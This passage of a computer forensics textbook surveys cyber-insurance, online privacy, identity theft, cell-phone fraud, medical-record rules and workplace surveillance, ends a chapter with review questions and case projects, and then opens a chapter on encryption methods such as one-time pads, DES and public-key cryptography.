of new products and alliances to help them gain market share
...
Wurzler has joined with Hewlett-Packard to market its products to a
select group of HP’s clients
...
Marsh & McClennan Companies, the world’s largest insurance brokerage, is selling insurance provided by AIG, Chubb, and Lloyd’s
...
Counterpane Internet Security has allied with brokers Safeonline and Frank Crystal & Co
...

It’s a wildly growing market, and its primary underwriters are AIG, Fidelity and
Deposit, and Wurzler
...
Well, now e-commerce has hit
...
A survey conducted in 2004 by the

600

Computer Forensics, Second Edition

FBI and the Computer Security Institute, an association of computer security personnel from the private and public sectors, found that from March 2002 to March
2003, 32% of the 1,085 governmental agencies and businesses that responded indicated that they experienced denial-of-service attacks
...

Losses from 2000’s “Love Bug” virus were estimated to be as high as $20 billion
...
Security analysts hope it
will encourage more Net companies to get insurance coverage
...
Anything Internet-facing is a point of vulnerability
...
There’s real exposure
and liability
...

Pricing cyberintrusions is pretty much a guessing game
...
6 billion figure associated with recent attacks, calculated by the Yankee Group, includes the expense
of security upgrades, consulting fees, and losses in market capitalization from tumbling stock prices
...
That’s like saying you don’t need to get a lock for your
front door unless somebody breaks in
...
A formula should be devised to calculate the
severity of hacks
...

In one famous case, an editor at the computer-security webzine Phrack was
charged with publishing a document stolen from BellSouth’s network
...
” It
was revealed at trial, however, that BellSouth sold a nearly identical document to
the public for just $14 per copy
...
S
...
The
study, released by the San Francisco–based Computer Security Institute (CSI) and
the San Francisco FBI Computer Intrusion Squad, found that 95% of survey respondents detected some form of security breach in 2003
...
This figure, up from 67% in 2001, didn’t include data from common
security problems caused by computer viruses, laptop theft, and abuse of Internet
access by employees
...
The figures are based on responses from 1,087 computer security practitioners in 617 U
...
corporations, government agencies, financial institutions, medical institutions, and universities
...
Eighty
respondents reported $100
...

CSI indicates a continuing trend in the study—that computer security threats
to large corporations and government agencies come from both inside and outside
the organization
...
Sixty-five respondents indicated that they suffered $51 million in damages from sabotage of data or
networks, compared to a combined total of $65 million for previous years
...
The short- and long-term personal economic impact on cyber
citizens continues to be staggering
...
The private sector
and government organizations must increase their focus on sound security practices, deployment of sophisticated defensive technology, and adequate training and
staffing of security managers
...
Not America Online,
which promises never to disclose information about members to “outside companies
...
The biggest collectors of information, it seems, are suddenly in the forefront of the campaign for our right to be left alone
...

True, millions of Americans are wary of the Internet, and surveys suggest that many
are hanging back because of confidentiality concerns
...
It’s also about fending off legislation
...
In particular, businesses are disturbed by one likely element of such a law: a subject access provision
that would allow citizens to find out what companies know about them and how
the information is being used
...
The technological costs, however, could be exceeded by the psychological costs
...
People are going to be horrified
...
The confidentiality
of video rentals is protected, for example, because a reporter got hold of Robert
Bork’s rental records during the fight over his failed nomination to the Supreme
Court
...

The market can do the job
...
That
premise, however, is under mounting attack on two fronts, domestic and foreign
...
A European Union (EU)
privacy directive that took effect in October 2004 not only includes subject access
but also requires that, when soliciting information from people, companies clearly
spell out what they intend to do with it
...
S
...
Accustomed to collecting data for hazy purposes (a “personalized
experience”), businesses reserve the right to discover more specific uses or sell the
information later on
...
S
...
The Sabre Group, a Texas-based airlinereservation network, is fighting in Swedish court for the right to maintain in its
global data bank such facts as a passenger’s wheelchair use or preference for kosher
meals
...
S
...
” The Europeans have gone to ridiculous extremes, creating privacy
commissions and “privacy czars” to deal with such trivialities as L
...
Bean’s decision to send out a catalog of their home products as opposed to their clothing
products
...

Double Standard
Such fears are overwrought, but European officials point to deep historical reasons
(including Nazism) for their view of privacy as a basic human right
...
S
...
But if Washington has to
make concessions, U
...
multinationals could find themselves in the ticklish position of explaining why they have granted rights to Europeans that they are trying to
withhold from Americans
...
In 1999, Microsoft was discovered to be collecting data
on users who had expressly requested anonymity
...
Online privacy protection has the potential to become a significant industry in itself, but it will grow much faster with legal incentives
...

Oddly enough, the concept of subject access originated in the United States,
with the Fair Credit Reporting Act of 1971
...

Many of the same companies that have been battling against a federal privacy
law have pressed Congress to enact more stringent copyright and patent laws
...


604

Computer Forensics, Second Edition

THE INDIVIDUAL EXPOSED
On the Internet, goes the saying, nobody knows you’re a dog
...
The Internet is now
more like an unlocked diary, with millions of consumers divulging marketable details of their personal lives, from where they live to what they eat for dinner
...
Software tracks the sites you visit and the pages that catch your eye
...

No one is immune
...

“Spammers” cram your emailbox with ads
...

Businesses recognize the Web’s potential as a shopping mall, but because of
concern over consumer privacy, many stores in that shopping mall have been
forced out of business
...
In a recent survey by the Boston Consulting Group, more than 77% of online users worried more about offering up private facts online than they did via phone or
mail—so they often refused or gave false information
...
Congress is examining the issue, too; several measures to govern the use and sale of personal
data, such as Social Security numbers, are pending
...
After all, a pro-consumer stance is good for business
...

Of course, you can avoid keying in anything you consider private, but that
would bar you from using quite a few sites, and abstinence is not always foolproof
...
Even
companies that advertise there can drop cookies on your hard drive without your
knowledge; some expire only after 2005
...
Surfing through
the Anonymizer hides your identity but slows you down to some degree
...
Many shareware programs, which can be tried out
before being purchased, can help you manage cookies (you might want to permit
cookies from a personalized news product, for example) or cut them out entirely
...
Résumé banks, professional directories, alumni registries,
and news archives can all be harvested, as well
...
The Delaware State Police
nabbed a couple recently who had obtained birth certificates and drivers’ licenses in
others’ names (thus enabling them to open bank accounts and get credit cards)
using information gleaned from sources that included the Internet
...

Eight major reference services announced an agreement at the FTC workshop
to prevent the misuse of nonpublic data, such as the name, address, and Social Security number found at the top of a credit report
...

The Fair Credit Reporting Act restricts dissemination of data in the body of a
credit report (such as credit card accounts, car loans, or mortgages), but does not
cover the material at the top
...
That raises questions about the quality of the data
...
Privacy
advocates say consumers should be told if any personal facts are being sold and
should have the right to dispute errors in the databases
...

Privacy advocates also argue that consumers should be able to opt out of junk
email, or spam
...
S
...
Although all major online services
and ISPs prohibit spamming and use filtering programs to weed it out (several have
won injunctions barring spammers from their networks), the filters don’t always

606

Computer Forensics, Second Edition

work
...
The FTC recently vowed to prosecute perpetrators of fraud and deception, soliciting the assistance of the Internet E-Mail Marketing Council
...
If that
does not happen, the FTC will consider taking stronger steps to enable people to
browse and buy confidently as if they were shopping at the local mall
...
And that’s just the beginning
...
After all,
the couple, who live in Kansas City, Kansas, were refinancing with their existing
mortgage lender and they prided themselves on their credit history
...

It turns out that a woman in Illinois had applied for credit 55 times using
Helus’s name and Social Security number
...
The perpetrator torched her credit
to the point where even the perpetrator herself was denied
...
It happens when
one individual uses another’s personal identification (name, address, Social Security number, date of birth, mother’s maiden name) to take over or open new credit
cards and bank accounts, apply for car and house loans, lease cars and apartments,
and even take out insurance
...
Meanwhile, the proliferation of black marks on a credit report can be devastating
...
Some run into trouble
applying for a job
...

Many identity thieves use stolen personal information to obtain driver’s licenses, birth certificates, and professional licenses, making it easier to get credit
...
Data have been
stolen from desk drawers in the workplace, mailboxes, job application forms, and
the Internet
...
Thieves typically have the bills
sent to an address that is not the victim’s, concealing the scheme for months, even
years
...

In the 1980s, criminals who wanted free plastic simply made up counterfeit
credit cards with the correct number of digits
...
Now
criminals are taking advantage of what some see as the weakest link in the credit
system: personal identity
...
Personal identifiers are now, more than ever, a
valuable commodity to criminals
...
Trans Union, for example,
one of the three major credit bureaus, indicates three-fourths of all consumer inquiries
relate to identity fraud
...
The costs of identity fraud can be very high: the Secret Service indicates
losses to victims and institutions in its identity-fraud investigations were $5
...
8 billion in 2000
...

Most victims call the police, but in states with no statute, some police departments refuse to take a report because the law sees the victim in a case of identity
fraud as the party that granted the credit (the bank or the merchant, for example),
not the person impersonated
...

Victims need proof because the attitude they often encounter when dealing
with creditors is guilty, guilty, guilty
...
That really aggravates Comfort, who has already been turned down for a mortgage
...
They have to do all the footwork themselves
...
Some require much more: one collection agency
told Helus it needed a copy of her driver’s license, her Social Security card, her birth
certificate, and any lease or mortgage contract from the past five years—all for an
$87 cable bill
...

As with many victims of identity theft, sensitive documents were the last thing she
wanted to send to a stranger
...
Many creditors
do not take the proper steps to verify the identity of the credit applicant
...
The application was preprinted with the impostor’s name and address, but the impostor
crossed off her own name (leaving her address) and wrote in Haskins name, Social
Security number, and occupation
...
All the
banks have systems that detect fraud
...

To make matters worse, two weeks after Haskins notified the bank that the account was fraudulent, the bank sold it to a collection agency, and she and her children
started receiving threatening phone calls and letters
...
The card
triggered an avalanche of preapproved credit offers to the phony Haskins mailbox:
One different address on a credit account was all it had taken for one of the credit bureaus to switch Haskins credit-file address to the impostor’s
...
Some credit bureaus won’t change a file address until three creditors report a new address, but a criminal on a spree can quickly cross that threshold
...
The credit bureau says contact the creditor, the creditor says contact the credit bureau, and the consumer just
gets ping-ponged back and forth
...
The letter did not say which of the 25 accounts it referred to
...
This notifies anyone who pulls the
report that the subject is a victim of fraud and that he or she should be called to verify any credit application
...

Credit bureaus might want to step up their efforts at finding a solution before
more aggrieved consumers turn to the courts
...

The award: $7
...

Meanwhile, the credit-reporting industry has formed a taskforce to tackle identity theft
...
Individual creditors
are also taking steps to stem their losses and prevent future ones
...
That’s how Irene Cole (named changed to protect privacy) of San Francisco found out her identity had been compromised
...


Civilian Casualties: The Victims and Refugees of Information Warfare

609

Identity theft is a crime that comes back to haunt its victims, and many are taking determined measures to prevent its recurrence
...
To her way of thinking, safeguarding her children’s identity is far more valuable
...
After all, who cares if someone overhears you telling your
husband or wife you’re stuck in traffic
...

Cellular service providers have a different security problem
...
In the early days of cellular telephony, service theft mostly meant
cloning
...
That problem has been reduced by almost two orders of magnitude
through the application of some thoughtful technology, but it has been replaced by
other problems: subscription fraud (the same problem that bedevils issuers of
credit cards) and the misapplication of service provider subsidies on handsets
...
Subsidy fraud involves taking a phone whose cost has
been heavily subsidized by a cellular carrier and activating it on a different carrier’s
network
...
However, the newest and best of them cannot be implemented on old handsets, so the technical situation is not without interest
...
On the
one hand, many of them need the revenue stream from a large number of subscribers to help them pay off the huge investments they made when they bid wildly
for spectrum space back in 1995
...

As the practice of conducting serious business over the Internet continues to
grow, other security issues will arise
...
The
technical solutions to be discussed here, such as radio frequency (RF) fingerprinting and authentication, do a good job of guaranteeing that the handset is what it
claims to be, but they guarantee nothing about the person using it
...
The problem, in
fact, is not finding solutions, but getting everyone to agree on which to use
...
The phone companies, as an industry,
must standardize that solution to drive mass-market end-user accessibility
...
Analog phones are
easy to bug; digital are hard
...
85–1
...
93–1
...
Moreover, it is hardly rocket science to modify a new, compliant receiver to add the extra bands
...

Lest anyone think that analog cellular telephony is an old, dead technology, as
of June 2002, over 40% of the subscribers in the United States still used analog
handsets, according to Boston’s Yankee Group
...

The latest figures from the Cellular Telecommunications Industry Association
(CTIA), indicate merely that digital penetration today exceeds 80% but the CTIA
counts dual-mode handsets as digital, so its number may not be so different from
the Yankee Group’s
...

Digital phones, be they of the time- or code-division multiple-access (TDMA
or CDMA) variety, are, unlike analog units, foolproof against eavesdropping by ordinary mortals
...
For
TDMA, what can be snatched out of the ether is a digital data stream representing
one side of each of three multiplexed conversations
...

In the case of CDMA, what they wind up with is an even thornier problem—a
mishmash of half a dozen conversations, each modulated by a different pseudorandom code, all occupying the same band
...
Plus, in digital
systems, voice is vocoded
...
As
before, someone interested in decompressing it needs to know the compression algorithm used
...
Small wonder that
none of the system operators or phone manufacturers regard eavesdropping on
digital cell phones as a problem
...
Conceived in innocence, early analog phones were almost comically vulnerable to security attacks
...
To program those numbers into another handset is the work of a
minute, and behold, another cloned phone is ready for use
...
Working with the U
...
Secret Service, they persuaded Congress
in 1998 to amend the law pertaining to “fraud and related activity in connection
with access devices” (Title 18, Section 1029, of the U
...
Code), so as to make it a
federal crime to own a scanning receiver or a cell-phone programmer with intent
to defraud
...
The law is serious, specifying maximum prison terms of 10 or 15 years (for
first-time offenders), depending on the exact nature of the crime
...
PINs certainly
made it tougher for thieves to use stolen phones, but because the PINs were transmitted in the clear, they were not very effective against cloning
...
The technology involves measuring several (unspecified) parameters associated with RF signals and characterizing them (again, in a proprietary manner) to produce a signature unique to the
transmitter being studied
...

Authentication Secrets
With the advent of digital and more advanced analog phones, an even more effective fraud-fighting technology came into use: authentication
...
Every time a call is

612

Computer Forensics, Second Edition

made, the network sends the handset a random number, which the handset then
combines with its secret number using an algorithm designed for the task
...
If the numbers match, the call is
completed; if not, it is not
...
If the input numbers are
off by even a single bit, the resulting number will not even be close to the right answer
...
This is not
to suggest that sophisticated code crackers could not do it (the experts at the NSA
would probably consider it a warm-up exercise), but even high-level criminals
rarely have access to the required expertise or equipment
...
Eighty-three percent of narcotics dealers arrested in 2001 were found to be in possession of cloned phones, according to testimony from the Drug Enforcement Administration
...
Like authentication, it requires a phone capable of performing its part of the process
...
Those numbers are compared
whenever a call is made
...
Obviously, if
someone has cloned a phone, then both he or she and the legitimate users will be
making calls, so the network will have their combined number, whereas each handset will have only its own
...
Cloning fraud has dropped about 99% over the past four to five years
...

Subscriber Fraud
Criminals, like electrons, tend to take the path of least resistance
...
In the case of
cell phones (or, more accurately, cell-phone service), the defenses in place against
cloning have motivated criminals to adopt the various techniques used by credit
card thieves, which are all lumped together under the rubric of subscriber fraud
...
S
...
As the law now stands, it is a federal crime merely to steal someone’s

Civilian Casualties: The Victims and Refugees of Information Warfare

613

identity information with intent to defraud
...

The industry became particularly susceptible to subscriber fraud when it started
pursuing new customers through such nontraditional channels as telemarketing and
the Internet
...
Now companies are finding they will have to get
back to the basics if they are to keep subscriber fraud losses at a tolerable level
...
Therefore, methods must be developed
for screening out bad risks without turning off legitimate customers
...
One thing computers are
being used to do is keep track of subscriber calling patterns—the numbers they
tend to call or receive calls from
...

Subsidy Loss
A major problem, especially in Latin America, is cell phones moving sideways
through the distribution channels
...
What sometimes
happens is that the phones wind up being activated on some other carrier’s network
...
In Latin America, that dealer
may not even be in the same country as the distributor
...

As with subscriber fraud, the remedy is mostly a matter of running a tighter
ship, but some sort of technological fix will also be developed, which can be described as an authentication kind of approach for the activation process
...


THE NEW ORDER AND STATE MEDICAL ID CARDS
The recent hacking of 9,000 administrative patient files from one of the country’s
top hospitals underscores the lack of firm, clear, universal standards to ensure the

614

Computer Forensics, Second Edition

security of online medical records
...

In an attempt to remedy the situation, the U
...
government is finalizing and releasing the security and privacy portions of the Health Insurance Portability and
Accountability Act (HIPAA), which will define interface and security standards
and policies
...

Bumpy Road Ahead
The industry still has a long way to go
...
A lot
of it is onerous and expensive, and a lot of it hard to interpret (see sidebar, “New
Medical Privacy Rules”)
...

The regulations, which were prepared by the U
...
Department of Health and
Human Services (HHS), are the final version of proposed rules that were issued in
1999 after Congress failed to pass comprehensive medical privacy legislation as
required by HIPAA
...
That casts a wider net than the original proposal, which applied to electronic
records and to paper ones that at some point had existed in electronic form
...
In
another change from the proposed rules, HHS indicates doctors and hospitals will be
given full discretion in determining what personal health information to include
when sending patients’ medical records to other providers for treatment purposes
...
Patients also must be given detailed written information about their privacy rights and any planned use of their personal information
...
Companies are prohibited from accessing health records for employment purposes
...
Criminal penalties of up to $250,000 and 10 years in prison
could also be targeted at individuals who try to profit from the sale of health
information
...

Nothing is more private than medical or psychiatric records, so if the government is to make freedom fully meaningful in the Information Age, when most of the
information is on some computer somewhere, then the government has to protect
the privacy of individual health records
...

HHS estimates that complying with the HIPAA rules will cost the health care
industry $40
...
In the long run, government officials claim, the regulations
will help achieve savings of almost $60 billion over the next 10 years, as a result of
related rules that eliminate paperwork by issuing standards for electronic communication of health insurance claims
...
Originally, HIPAA was intended
to apply solely to electronic communications
...

One of the problems is that HIPAA is supposed to offer specifications to cover
all privacy implementations, from one-doctor offices to giant health care organizations
...

Lessons to Learn
However, there is a whole range of institutions that must be educated on any
guidelines to be implemented, including third-party companies that offer electronic patient-record hosting or storage [4]
...
A bankrupt
company could sell its data to a company with a different privacy policy
...
The biggest resistance is fear
...


616

Computer Forensics, Second Edition

BIG BROTHER IS HERE AND IS STAYING
Workplace surveillance was the leading privacy concern in 2004, according to an
analysis recently released by the Privacy Foundation, a Denver-based nonprofit
group that performs research and educates the public on privacy issues
...
Threefourths of major U
...
companies now perform some type of in-house electronic
surveillance according to the American Management Association, and 32% of all
companies surveyed now monitor email
...
Dow Chemical
fired 68 employees and disciplined 679 others in 2004 for allegedly storing and
sending sexual or violent images on the company’s computers
...
, and the CIA were others that fired or disciplined employees because of alleged bad behavior
...
But pervasive or spot-check surveillance conducted through keystroke monitoring software, reviewing voice-mail
messages, and using mini video cameras will undoubtedly affect morale and labor
law, as well as employee recruitment and retention practices
...
Big Brother is here and staying, and, it’s only going
to get worse
...
Across Europe recently, politicians and the press were in full cry over a vast Anglo-American electronic surveillance system named Echelon
...
Echelon, said Parliament President Nicole
Fontaine, is “a violation of the fundamental rights” of European Union citizens
...
Charges cited are mostly old, well-known cases: In 1994,
U
...
intelligence discovered that French companies were offering bribes to Saudi
Arabia and Brazil for multibillion-dollar contracts
...
S
...


Civilian Casualties: The Victims and Refugees of Information Warfare

617

U
...
officials insisted last week that American intelligence does not steal trade
secrets for U
...
firms
...
In some ways, people’s
communications have never been safer from becoming intelligence, and France is
certainly not a slouch in the industrial espionage arena
...
” Just a
few days earlier, a French intelligence report suggested the NSA helped create Microsoft to eavesdrop around the world
...

BioFusion
Buck Rogers, meet John Norseen
...
The Lockheed Martin neuroengineer hopes
to turn the “electrohypnomentalophone,” a mind-reading machine invented by
one of Buck’s buddies, from science fiction into science fact
...
The former Navy pilot coined the term bioFusion to cover his plans to
map and manipulate gray matter, leading (he hopes) to advances in medicine, national security, and entertainment
...

BioFusion would be able to convert thoughts into computer commands, predicts Norseen, by deciphering the brain’s electrical activity
...

The key is finding “brain prints
...
It
leaves a fingerprint
...
Just like you can find one person in a million through fingerprints, you can find one thought in a million
...
NASA, DARPA, and
the Army’s National Ground Intelligence Center have all awarded small basic research contracts to Norseen, who works for Lockheed Martin’s intelligent systems

618

Computer Forensics, Second Edition

division
...

Norseen’s theories are grounded in current science
...
By viewing a brain scan recorded by a magnetic resonance
imaging (MRI) machine, scientists can tell what the person was doing at the time
of the recording, for example, reading or writing
...

Applying Neuroscience Research to Antiterrorism

Norseen has submitted a research and development plan to the Pentagon, at its request, to identify a terrorist’s mental profile
...
Norseen predicts profiling by brain print will be in place
by 2009
...
Scientists have
already linked mind and machine by implanting electrodes into a paralyzed man’s
brain; he can control a computer’s cursor with his mind
...
A modified helmet could record a pilot’s brain waves
...
If the pilot misheard instructions to turn 090 degrees and was thinking
“080 degrees,” the helmet would detect the error, then inject the right number via
electromagnetic waves
...
Norseen feels he is “agnostic” on the moral ramifications, that he’s not a mad scientist—just a dedicated one
...


SUMMARY
This chapter has considered the application of civilian information operations
(CIOs) to the conventional warfare environment
...

Accordingly, the introduction of a CIO capability into an existing military force requires careful consideration and adherence to a series of principles espoused within
this chapter
...


Civilian Casualties: The Victims and Refugees of Information Warfare

619

This framework can be applied to both the introduction of a CIO capability and the
application of CIO’s in information warfare
...
However, CIOs can be applied to today’s conventional environment, and it is within this context that more urgent attention from
military planners is required
...
They may be
used to strike enemy systems, control the overall information environment, deter
enemy aggression, or support either themselves or other military strategies
...

Conclusions
Information warfare (IW) is the latest development in a long list of revolutions
in military affairs based on new technology (other examples include the introduction of airplanes, the atom bomb, and long-range missiles)
...

Information systems are so critical to military operations that it is often more
effective to attack an opponent’s information systems than to concentrate on
destroying its military forces directly
...
S
...
Because these systems rely on each other, a serious disruption in any
one system will cascade quickly through the other systems, potentially causing
a national security crisis
...

In addition to outages caused by natural disasters and accidents, these systems
present a tempting target for IW attack to those contemplating an action
against U
...
interests
...

The ethical questions about IW are not meant to be a complete set of ethical
questions, but rather a subjective assessment of what are the ethical questions
derived from the most important issues exposed by IW
...

It is hoped that this research will begin a dialog on the issues and lay a framework for more substantive work by ethicists
...

The threat of IW raises the following ethical challenges: (1) What constitutes an
act of war in the Information Age? (2) What are the ethical implications of the
blurring distinction between acts of war, acts of espionage, and acts of terrorism? (3) Can IW be considered nonlethal? (4) Is it ethical to set expectations for
a “bloodless war” based on IW? (5) Is it ethically correct to respond to IW tactics with IW tactics? (6) Can protection from IW take place in the United
States, given our democratic freedoms?
An Agenda for Action
Three policy questions dominate the issue of critical infrastructure protection for
civilian casualties of IW: how limited should the government’s role be, what is adequate infrastructure security and how will appropriate standards be determined,
and what data does the government need from business and why? None seems fundamentally settled, if only because policy continues to develop
...
Nonetheless, a few basic principles are emerging that
should guide infrastructure protection efforts
...
S
...
Action steps should
include, but not be limited to the 10 areas as shown in Table F19
...

Finally, let’s move on to the real interactive part of this chapter: review
questions and exercises, hands-on projects, case projects, and optional team case
project
...


CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...

2
...

3
...


Civilian Casualties: The Victims and Refugees of Information Warfare

621

4
...

5
...

Multiple Choice
1
...
Electric power system
B
...
Web site
D
...
Transportation
2
...
The incident must not be well defined
...
The identity of the perpetrator must be unambiguous
...
The will and ability to carry out a deterrence strike must be believed
...
The perpetrator must have something of value at stake
...
The deterrence strike must be controllable
...
In what has been called the “complex-system issue,” the following are axioms,
except:
A
...

B
...

C
...

D
...

4
...
The resort to force must have a just cause
...
It must be authorized by a competent authority
...
It is expected to produce a preponderance of evil over good
...
It must have a reasonable chance of success
...
It must be a last resort
...
By changing perspectives from defense to offense, the following are in the U
...

arsenal to wage IW against an adversary, except:
A
...
Sniffing or “wiretapping” software (enabling the capture of an adversary’s
communications)
C
...
Directed non-energy weapons (designed to destroy electronics, not humans and buildings)
E
...
The company has been conducting internal
investigations since the late 1990s, but they needed to ensure that they had the
proper processes in place to meet federal requirements regarding rules of evidence
...
S
...
Founded in 1906, the
firm is a leader in innovative legal services—overseeing the functionality and maintenance of approximately 1,800 machines on a daily basis
...
These
areas may also overlap during an investigation
...
How would a CFS go about conducting an investigation under these circumstances?

Civilian Casualties: The Victims and Refugees of Information Warfare

623

Case Project
An incident was discovered by a global pharmaceutical and medical manufacturing
company that caused major concerns
...
This manager was a 20-year veteran who had an impeccable employee
record, and prior to this incident the employee’s behavior had never been in question
...
It
was very important to be able to respond quickly to resolve the potential situation,
and to be discreet, in order to protect the manager’s privacy and good reputation
...
A product manufacturer (client) alleged that a former employee removed
files containing corporate secrets from their computer systems and then used these
secrets as the basis for establishing a new company, making a competitive product
line, and marketing to the client’s customer base
...

How was the CFS able to go about conducting the investigation?

REFERENCES
[1] Vacca, John R
...

[2] Vacca, John R
...

[3] Vacca, John R
...

[4] Vacca, John R
...

[5] Vacca, John R
...

[6] Cypel, Sylvain, “How the United States Spies on You,” Le Monde, March 5,
2002
...


T

This page intentionally left blank

20

Advanced Computer
Forensics

he rise of the so-called information economy, borne along by proliferating
computers, sprawling telecommunications, and the Internet, has radically
transformed how people do business, govern, entertain themselves, and converse with friends and family
...

The very things that allow such speed and ease of communication have also
made it far more difficult to ensure one’s privacy [1]
...
Mounting concern over the new threats to privacy
and security has led to widespread adoption of cryptography
...

Over the past two decades, individuals and businesses alike have embraced the
technology, using it for everything from sending email and storing medical records
and legal contracts to conducting online transactions
...

If ordinary individuals can now encrypt a message in all but unbreakable form,
then so can criminals, terrorists, and other troublemakers
...
In the past, armed (or not) with a court warrant, police could
readily get at hidden documents by, for example, forcing a safe, but physical force
is of no use in decoding computer-encrypted data
...
Repressive
regimes fear that dissident groups will use encryption to promote their subversive

T

627

628

Computer Forensics, Second Edition

ideas
...
Indeed, the U
...
government once categorized encryption technology as a controlled munition, on a par with nuclear weapons, and until very
recently it banned the export of the most advanced encryption products
...
The ensuing battle over
encryption has taken on several dimensions—technical, legal, ethical, and social
...

With the rise of hard-to-crack encryption, sensitive data is easier to protect—
and criminal activity tougher to monitor
...
S
...


ADVANCED ENCRYPTION: THE NEED TO CONCEAL
On German television several years ago, a stunned audience looked on as an unsuspecting Web surfer had his computer scanned while he was visiting a site
...

The vulnerability of computer data affects everyone
...
Even computer data that the user
may believe to be deleted or overwritten can be retrieved
...
In these cases, possession is not
nine-tenths of the law
...

The purpose of encryption is to render a document unreadable by all except
those authorized to read it
...
The key is a randomly selected string of numbers; generally speaking, the
longer the string, the stronger the security
...
One precomputer method is the conceptually simple,
yet very strong, encryption scheme known as the one-time pad, developed in 1926
by Gilbert S
...

The term “unbreakable encryption” is somewhat misleading
...
Tactical data, for example, often requires encryption that takes
only slightly longer to break than the useful life of that data
...


COMPUTER-FREE ENCRYPTION
The durable encrypting scheme known as the one-time pad gets its name from the
use of a key once and once only for just one message
...
These numbers become the key
...

Next, she encodes the plaintext word “hello,” which, in accordance with the preceding sequential numbering of the letters, corresponds to the sequence 08, 05, 12,
12, 15
...
In other words,
H E L L O
08 05 12 12 15
+ 56 34 01 92 27
______________
= 54 39 13 04 32
This last sequence (54, 39, 13, 04, 32) is the ciphertext, which gets sent to Wolfgang, the intended recipient
...


630

Computer Forensics, Second Edition

Wolfgang has an exact copy of the key (56, 34, and so on)
...
The result is not truly random: computers’ pseudorandom number generators use only 16 (or, in some cases, 32) bits to store their values
...
One remedy is to
tweak the pseudorandom number generator by applying an external physical
process to generate noise—maybe a sufficiently amplified semiconductor junction
of 1/f noise—but that further requires removing the influence of predictable external influences, such as 50–60-Hz noise
...
To escape cryptanalytic attacks involving statistical
analyses, the key must be used only once
...
The sender and the recipient, therefore, need a totally secure opportunity to exchange the key, which is hard to come by
when the two are far apart
...
Alternatively, a fake key could be designed to yield
a plausible-looking, but still false, document, thereby fooling people into believing
they have cracked the code [2]
...
Many of the encryption schemes

Advanced Computer Forensics

631

available today are also symmetric, most notably the Data Encryption Standard, or
DES (see sidebar, “A Menu of Symmetric Encryption Algorithms”)
...

Here are the most popular
...


T RIPLE DES
Encrypting the already DES-encrypted output with a different output with a different key provides no measurable security, but adding a third round of DES encryption yields a highly secure, albeit slower, algorithm
...


T HE I NTERNATIONAL D ATA E NCRYPTION A LGORITHM
The international data encryption algorithm (IDEA) uses a 128-bit key developed by
ETH Zurich, in Switzerland
...
S
...
of Bern, Switzerland, but noncommercial use is free
...
It is used in Pretty Good Privacy (PGP) and Speak Freely (a program that allows an encrypted digitized voice to
be sent over the Internet)
...
Developed in 1993
by Bruce Schneier of Counterpane Internet Security Inc
...


T WOFISH
Twofish, also developed by Schneier, is reputedly very strong, and, as one of five candidates for AES, is now being extensively reviewed by cryptanalysts
...
, Bedford, Massachusetts
...


Developed in the 1970s, DES is still popular, especially in the banking industry
...
The alternative, known as stream ciphers, encode the stream of data sequentially without segmenting it into blocks
...
Currently,
AES has already replaced DES in many organizations worldwide
...
Unlike DES, however, it
will be competing with other algorithms—algorithms that will not suffer from any
suspicion that the U
...
government has a back door into the code
...
This is clearly undesirable because the encrypted output betrays important information about the plaintext
...

Another problem with symmetric key encryption is that it requires that the
sender and recipient of a message have a secure means for exchanging the encryption key
...
Repeated use of the same key creates its own security weakness
...
Their public key encryption scheme, first described in IEEE
Transactions on Information Theory, allows the recipient to verify that the sender is
who he or she appears to be and that the message has not been tampered with
...
Each directs his or her copy of the
software to create a key, or rather, a pair of keys
...

Bob makes known (by email, by posting to a Web site, or however else he
chooses) one of the keys of his pair; this becomes his public key
...
Each retains under tight control the other key in the pair, which is now his or
her private key
...
1) [2]
...
In effect, Bob and Alice can now exchange encrypted

1

2

Public
Key

Private
Key

_______
________
________
________
________
________
________
________
________
________
________
________

Bob

Plaintext

_______
________
________
________
________
________
________
________
________
________
________
________

___
____ __
__
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
__ ____
__ __
__

Decrypt

Ciphertext

Encrypt

Alice

Plaintext

_______
________
________
________
________
________
________
________
________
________
________
________

2

Bob

Alice
___
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
____ ____
____

_______
________
________
________
________
________
________
________
________
________
________
________

1
Imposter

Plaintex

Decrypt

Ciphertext

FIGURE 20
...
This scheme allows encrypted files to be
sent in the absence of a secure means to exchange keys, a major improvement over
symmetric encryption
...


634

Computer Forensics, Second Edition

files in the absence of a secure means to exchange keys, a major advantage over
symmetric encryption
...

Suppose Bob sends a message to the world after encrypting it with his private key
...

Message authentication, the validation that the message received is an unaltered copy of the message sent, is also easy: Before encrypting an outgoing message,
Bob performs a cryptographic hash function on it, which amounts to an elaborate
version of a checksum
...
It is extremely difficult to alter the plaintext message without altering the hash value (Figure 20
...

The widely used hash function MD5, developed by Rivest in 1991, hashes a file
of arbitrary length into a 128-bit value
...
S
...

Public-key encryption has been a part of every Web browser for the past few
years
...

One drawback of public key encryption is that it is more computationally intensive than symmetric encryption
...
2 Public key encryption allows Alice to verify that a message from Bob
actually came from him and that it is unaltered from the original
...
Alice then decodes the received ciphertext using her
own (orange) private key, decodes the hash value using Bob’s public key, thereby
confirming the sender’s authenticity, and compares the decrypted hash value with one
that she calculates locally on the just decrypted plaintext, thereby confirming the
message’s integrity
...
The differently encrypted
plaintext and key are then both sent to the recipient
...
Realistically, though, the public key
should be even longer than that, because the same public and private key pair is
used to protect all messages to the same recipient
...
To be sure, cracking an encryption key is just one way to get at sensitive data (see sidebar, “Human and Hardware Frailties”)
...
Often, the real weaknesses in security lie in the human
tendency to cut corners
...
Windows-based computers and many software products, in their quest to
be user-friendly, often leave extensive electronic trails across the hard drive
...

Furthermore, unless each file is encrypted using a different key or a different
encryption method, an attacker who can somehow read one encrypted file from or to a
given person can probably also read many other encrypted files from or to that person
...
In 1995, the so-called timing attack became popular
...

Public key encryption algorithms such as RSA and Diffie-Hellman are open to such
attacks
...
It is also possible to assess the electronic paper trail left behind when
the hardware is made to fail in the course of an encryption or decryption
...
Unfortunately, these schemes are
often implemented as an afterthought by engineers who may be very competent in
their respective fields but have minimal experience in cryptography
...
In general, however, “proprietary,” “secret,” or “revolutionary” schemes
that have not withstood the scrutiny of cryptanalysts over time are to be avoided
...
If the software proudly informs the user that this is the wrong key,
that encryption method should be discarded
...
The cryptanalyst would
merely have to keep trying different keys until the software identified the correct
one
...
Given the preceding, the odds favor the
person attacking an encrypted file, unless the person being attacked is very knowledgeable in the ways of information security [2]
...
1)
...

One of the most commonly used public key algorithms is the 24-year-old RSA,
